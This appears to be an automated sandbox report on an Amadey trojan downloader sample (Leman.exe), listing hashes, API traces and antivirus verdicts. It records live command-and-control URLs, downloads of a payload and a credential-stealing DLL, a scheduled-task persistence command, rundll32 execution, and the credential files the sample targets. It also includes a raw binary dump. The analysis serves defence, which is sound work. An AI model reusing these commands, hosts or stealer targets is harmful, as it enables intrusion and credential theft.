popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Leman.exe

Malicious Library UPX Malicious Packer PWS DLL OS Processor Check PE32 PE File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Dec. 30, 2022, 6:19 p.m. Dec. 30, 2022, 6:21 p.m.
Size 235.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 5e445faf7b08cf2ffcac7b38c5d70d5d
SHA256 4414a9ba25d52ac38509ccf072d32e4f938990e3b02ca3c2d11fbd5cba433ab4
CRC32 3E60DFE2
ssdeep 6144:IkwjBO99g6779r0psUhmiIuVyD2NgCJgN:1TrOh2uVyCNnS
PDB Path D:\Mktmp\Amadey\Release\Amadey.pdb
Yara
  • IsPE32 - (no description)
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • Malicious_Packer_Zero - Malicious Packer
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
transfer.sh
A 144.76.136.153
144.76.136.153
IP Address Status Action
144.76.136.153 Active Moloch
164.124.101.2 Active Moloch
62.204.41.91 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "nbveek.exe" has successfully been created.
console_handle: 0x00000007
1 1 0
pdb_path D:\Mktmp\Amadey\Release\Amadey.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://62.204.41.91/8kcnjd3da3/index.php
suspicious_features GET method with no useragent header suspicious_request GET http://transfer.sh/get/6ffUHF/pypfhc2o51o.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://62.204.41.91/8kcnjd3da3/Plugins/cred64.dll
request POST http://62.204.41.91/8kcnjd3da3/index.php
request GET http://transfer.sh/get/6ffUHF/pypfhc2o51o.exe
request GET http://62.204.41.91/8kcnjd3da3/Plugins/cred64.dll
request POST http://62.204.41.91/8kcnjd3da3/index.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75bf1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x764b1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fb0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72cd1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72c94000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e21000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73941000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73251000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e01000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x730d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74141000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72df1000
process_handle: 0xffffffff
1 0 0
description nbveek.exe tried to sleep 155 seconds, actually delayed analysis time by 155 seconds
file C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\d003af69b2\nbveek.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\d003af69b2\nbveek.exe" /F
file C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\d003af69b2\nbveek.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\d003af69b2\nbveek.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\d003af69b2\nbveek.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽ¡ œX|ª°@@ðOà& àCODE”šœ `DATA´° @ÀBSSá дÀ.idata&à´@À.edataOðÄ@P.relocàÆ@P.rsrc ä@P@ø@P@ StringX@X@¤<@°<@´<@¸<@¬<@$:@@:@|:@TObjectd@TObjectX@System„@ IInterfaceÀFSystemÿÿ̃D$øé©KƒD$øéÇKƒD$øéÑKÌ̱@»@Å@ÀFÑ@@L@Ý@L@ @¤<@8\@D\@¸<@¬<@T\@@:@|:@TInterfacedObject‹Àÿ%¨áA‹Àÿ%¤áA‹Àÿ% áA‹Àÿ%œáA‹Àÿ%˜áA‹Àÿ%”áA‹Àÿ%áA‹Àÿ%ŒáA‹Àÿ%ˆáA‹Àÿ%„áA‹Àÿ%€áA‹Àÿ%|áA‹Àÿ%¼áA‹Àÿ%xáA‹Àÿ%¸áA‹Àÿ%táA‹Àÿ%páA‹Àÿ%láA‹Àÿ%háA‹Àÿ%dáA‹Àÿ%`áA‹Àÿ%\áA‹Àÿ%XáA‹Àÿ%TáA‹Àÿ%PáA‹Àÿ%LáA‹Àÿ%HáA‹Àÿ%´áA‹Àÿ%DáA‹Àÿ%@áA‹Àÿ%<áA‹Àÿ%ÌáA‹Àÿ%ÈáA‹Àÿ%ÄáA‹Àÿ%8áA‹Àÿ%4áA‹Àÿ%ÜáA‹Àÿ%ØáA‹Àÿ%ÔáA‹Àÿ%0áA‹Àÿ%,áA‹Àÿ%(áA‹Àÿ%$áA‹ÀSƒÄ¼» TèYÿÿÿöD$,t·\$0‹ÃƒÄD[ËÀÿ% áA‹Àÿ%áA‹Àÿ%áA‹Àÿ%áA‹Àÿ%áA‹Àÿ% áA‹Àÿ%áA‹Àÿ%áA‹ÀSƒÄô»àÕAƒ;uYhDjè¦ÿÿÿ‰D$ƒ|$u3À‰$ëP‹D$‹ÜÕA‰‹D$£ÜÕA3À‹ÐҋL$TщT$‹T$‹ ‰ ‹T$‰@ƒødu܋‰D$‹D$‹‰‹D$‰$‹$ƒÄ [ɉ@ËÀSVƒÄø‹ò‹Øèfÿÿÿ‰D$ƒ|$u3Àë:‹‹T$‰B‹F‹T$‰B ‹‰$‹D$‹$‰‹D$‰X‹$‹T$‰P‹D$‰°YZ^[ÃÄø‹P‰$‹‰T$‹$‹L$‰ ‹T$‹ $‰J‹àÕA‰£àÕAYZËÀSVWUƒÄø‹Ù‹ð‹ü‹‰‹‰‹B‰C‹‹‰D$‹‹R‹Ê‹/M ‹;Èu‹èÿÿÿ‹‹@‰‹‹@ CëC;Ðu‹èqÿÿÿ‹‹@ C‹D$‰;7u®‹Ó‹Æèúþÿÿ„Àu3À‰YZ]_^[Í@SVWUƒÄð‰$‹ô‹‰D$ ‹ ‹‹@;È‚†‹Ø‹>_ ‹ùz;ßrv;Èu!‹B‹A‹B‹)B ‹ƒx uV‹èðþÿÿëM‹Ø‹>_ ‹ùz;ßu ‹B‹)B ë3‹Z‰\$‹>‹‹.} +û‰|$+ȋ‰H T$‹èMþÿÿ„Àu3Àë°ë‹‹‰‹;D$ …Yÿÿÿ3ÀƒÄ]_^[ÐSVW‹Ú‹ðþ}¾ë Æÿÿæÿÿ‰sjh Vjè4ýÿÿ‹ø‰;…ÿt#‹Ó¸äÕAèÜýÿÿ„Àuh€j‹Pèýÿÿ3À‰_^[ÐSVWU‹Ù‹ò‹èÇCjh hUèáüÿÿ‹ø‰;…ÿuÆÿÿæÿÿ‰sjh VUè¼üÿÿ‰ƒ;t#‹Ó¸äÕAèeýÿÿ„Àuh€j‹Pèžüÿÿ3À‰]_^[ÐSVWUƒÄè‹ù‹ôÇD$ÿÿÿÿ3ɉL$ ‰D$T$‰T$¡äÕA‰ëk‹‹‰D$‹‹X;\$rR‹Ã‹B ;D$wE;\$s‰\$‹‹h‹h ;l$ v‰l$ h€j‹‹@Pèüÿÿ…Àu ÇÀÕA‹èýÿÿ‹D$‰¸äÕA;uŒ3À‰ƒ|$ t‹D$‰‹D$ +D$‰GƒÄ]_^[ËÀSVWUƒÄè‹Ù‰$t$|$l$ ‹Ð‹Êáðÿÿ‰L$$Âÿâðÿÿ‰T$‹D$‰‹D$+D$‰C¡äÕA‰ë[‹‹@‰‹‹@ ‰E‹;D$s‹D$‰‹E;D$v‹D$‰E‹;Esjh‹E+P‹Pè&ûÿÿ…Àu3À‰ë‹‹‰¸äÕA;uœƒÄ]_^[ÐSVWUƒÄè‰$t$|$\$ ‹Ð‹êÅÿåðÿÿ‰l$$âðÿÿ‰T$‹D$‰‹D$+D$‰A¡äÕA‰ëX‹‹@‰‹‹@ ‰‹;D$s‹D$‰‹;D$v‹D$‰‹;s h@‹+P‹Pèwúÿÿ…Àu ÇÀÕA‹‹‰¸äÕA;uŸƒÄ]_^[ËÀSVWUƒÄô‹Ú‹ð‹ü½ôÕAÆÿ?æÀÿÿ‹E‰ëA‹;p 4‹Ë‹‹@‹ÖèJþÿÿƒ;t_‹C‹B‹C‹)B ‹ƒx uG‹èûÿÿë>‹‹‰;/u»‹Ó‹Æèmüÿÿƒ;t&L$‹Ó‹Åèûÿÿƒ|$u’L$‹S‹è"ýÿÿ3À‰ƒÄ ]_^[ËÀSVWUƒÄè‰ $‹ú‹Øt$½ôÕAÇÿ?çÀÿÿ‹E‰ë‹‹‰;.t‹;Xuï‹;Xu_‹;x Žœ‹‹×+P ‹‹@‹A L$è5üÿÿƒ|$t3L$T$‹Åèoúÿÿƒ|$uŸL$‹T$ ‹D$èüÿÿ‹$3҉隍L$‹×‹Ãèîûÿÿƒ|$t4L$T$‹Åè(úÿÿƒ|$…TÿÿÿL$‹T$ ‹D$è4üÿÿ‹$3҉ëR‹‹h;ÝuB‹;x ;‹ $‹Å‹×è×üÿÿ‹$ƒ8t.‹$‹@‹B‹$‹@‹)B ‹ƒx u‹è†ùÿÿë‹$3҉ƒÄ]_^[ÐSƒÄè‹Ùˆÿ?áÀÿÿ‰ $ЁâÀÿÿ‰T$‹D$;$v_‹Ë‹T$+$‹$èýÿÿL$‹Ó¸ôÕAè]ùÿÿ‹\$…ÛtL$‹T$ ‹Ãènûÿÿ‹D$‰D$‹D$‰D$ ƒ|$tT$¸ôÕAè©ùÿÿë3À‰ƒÄ[ËÀU‹ìQ3ÒUhì@dÿ2d‰"hÄÕAè¼÷ÿÿ€=EÐAt hÄÕAè±÷ÿÿ¸äÕAèCøÿÿ¸ôÕAè9øÿÿ¸ ÖAè/øÿÿhøjè_÷ÿÿ£ÖAƒ=ÖAt@¸‹ÖA3ɉL‚ô@=uìÇEüÖA‹Eü‹Uü‰P‹Eü‹Uü‰‹Eü£ÖAƼÕA3ÀZYYd‰hó@€=EÐAt hÄÕAè!÷ÿÿÃéƒ#ëå ¼ÕAY]ÐU‹ìƒ
request_handle: 0x00cc000c
1 1 0
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\d003af69b2\nbveek.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\d003af69b2\nbveek.exe" /F
host 62.204.41.91
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\d003af69b2\nbveek.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\d003af69b2\nbveek.exe" /F
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
registry HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
file C:\Users\test22\AppData\Roaming\.purple\accounts.xml
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Bkav W32.AutoMnunAAE.Trojan
DrWeb Trojan.SpyBot.1164
MicroWorld-eScan Gen:Variant.Doina.45665
FireEye Generic.mg.5e445faf7b08cf2f
ALYac Gen:Variant.Doina.45665
Cylance Unsafe
Zillya Downloader.Amadey.Win32.129
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Trojan-Downloader ( 005790d31 )
K7GW Trojan-Downloader ( 005790d31 )
Cybereason malicious.f7b08c
Arcabit Trojan.Doina.DB261
BitDefenderTheta AI:Packer.803C8E5C1F
VirIT Trojan.Win32.Genus.NIP
Cyren W32/Agent.TIXB-6216
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/TrojanDownloader.Amadey.A
APEX Malicious
Kaspersky HEUR:Trojan-Downloader.Win32.Deyma.gen
BitDefender Gen:Variant.Doina.45665
NANO-Antivirus Trojan.Win32.Redcap.jtxxqn
Avast Win32:BotX-gen [Trj]
Ad-Aware Gen:Variant.Doina.45665
Sophos Mal/Horst
VIPRE Gen:Variant.Doina.45665
McAfee-GW-Edition BehavesLike.Win32.Generic.dh
Trapmine suspicious.low.ml.score
Emsisoft Gen:Variant.Doina.45665 (B)
SentinelOne Static AI - Malicious PE
Jiangmin TrojanDownloader.Deyma.aol
Google Detected
Antiy-AVL Trojan[Downloader]/Win32.Amadey
Gridinsoft Trojan.Win32.Sabsik.dd!s1
Microsoft Trojan:Script/Phonzy.A!ml
ZoneAlarm HEUR:Trojan-Downloader.Win32.Deyma.gen
GData Gen:Variant.Doina.45665
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win.Generic.C5234847
Acronis suspicious
McAfee Artemis!5E445FAF7B08
MAX malware (ai score=80)
VBA32 TrojanDownloader.Deyma
Malwarebytes Spyware.Amadey
Rising Downloader.Amadey!8.125AC (TFE:5:kxJFejq2FbQ)
Ikarus Trojan-Downloader.Win32.Amadey
Fortinet W32/Injector.EGTS!tr
AVG Win32:BotX-gen [Trj]